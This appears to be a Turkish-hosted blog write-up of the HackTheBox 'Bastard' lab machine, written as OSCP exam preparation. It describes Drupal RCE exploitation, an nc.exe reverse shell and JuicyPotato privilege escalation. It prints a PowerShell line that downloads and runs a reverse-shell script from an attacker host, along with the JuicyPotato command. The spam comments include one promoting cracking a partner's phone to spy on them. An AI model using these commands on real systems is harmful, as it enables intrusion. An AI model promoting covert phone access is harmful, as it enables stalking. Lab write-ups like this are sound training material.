OSCP PREPROTİONS – HTB Bastard

Bastard machine is a vulnerable machine with windows operating system among retired machines. It is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Clasic Scan

Full port Scan

As a result of port scanning, “80/tcp http IIS httpd 7.5, 135/tcp msrp Windows RPC, 49154/tcp msrpc Windows RPC” ports are open.
We provide enumeration over port 80.

We encountered a drupal cms that offers admin passord, we tried default passwords but we were not successful. We checked the saturas given by Nmap and saw the version number in the /CHANGELOG.txt directory

We saw it was 7.54, so let’s see if there’s a vulnerability with that.
Searchsploit found

There is an RCE vulnerability, we prefer not to be authenticated because we still haven’t found any credential information at the moment.
I’m trying to exploit this vulnerability on my own machine.

We edited this line according to what we wanted.
But when we tried to run this exploit we got an error

Let’s search for exploits on Github

We dowloand this and used it

Let’s run it on the target we have seen its usage

Here we were able to run the whoami command.
Now let’s try to install and run nc to give us an interactive Shell
We’ve installed nc on the target

Then we ran nc.exe and it gave us Shell

Here we have obtained the user flag but we cannot access the administrator folder

Here we enumerate local to get the root flag.

We understand that there is a JuicyPotato appetizer here.
We pass JuicyPotato.exe and Shell.bat to the target machine
Shell.bat includes (powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.14.19:8000/Invoke-PowerShellTcp.ps1’)”)
We write

Then we pass it on.

Then run JuicyPotato.exe
.\JuicyPotato.exe -t * -p shell.bat -l 5555 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

We write, we run, Shell comes on port 4723, which we listen with nc

Now we get the root flag

Comments

  1. Pingback: OSCP Prep – HTB all Windows Machine – Muhammed AYGÜN

  2. sklep online

    Hey! Someone in my Myspace group shared this site with us so I
    came to give it a look. I’m definitely enjoying the information. I’m bookmarking and will be tweeting this to my followers!

    Exceptional blog and amazing style and design. I saw similar here:
    Najlepszy sklep

  3. dobry sklep

    Hi there just wanted to give you a quick heads up.
    The words in your post seem to be running off the screen in Opera.

    I’m not sure if this is a format issue or something to do with web browser compatibility but I figured I’d post to let you know.
    The design and style look great though! Hope you get the problem resolved soon. Cheers I saw similar here: Najlepszy sklep

  4. e-commerce

    Hi there! Do you know if they make any plugins to help with SEO?
    I’m trying to get my blog to rank for some targeted keywords but I’m not seeing very good results.
    If you know of any please share. Many thanks!
    You can read similar article here: Dobry sklep

  5. Phone Tracker Free

    When you forget the password to lock the screen, if you do not enter the correct password, it will be difficult to unlock and gain access. If you find that your boyfriend/girlfriend is suspicious, you may have thought about hacking his Samsung phone to get more evidence. Here, we will provide you with the best solution on how to crack Samsung mobile phone password.

  6. hitman.agency

    Good day! Do you know if they make any plugins to assist
    with Search Engine Optimization? I’m trying to get my blog to rank for some targeted
    keywords but I’m not seeing very good results. If you know of any please share.

    Kudos! You can read similar text here: Backlink Building

  7. GSA Verified List

    Hello there! Do you know if they make any plugins to help with Search Engine Optimization? I’m trying to get my website to rank for some targeted keywords but I’m not seeing very good success.
    If you know of any please share. Thank you! I saw similar article here:
    AA List

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir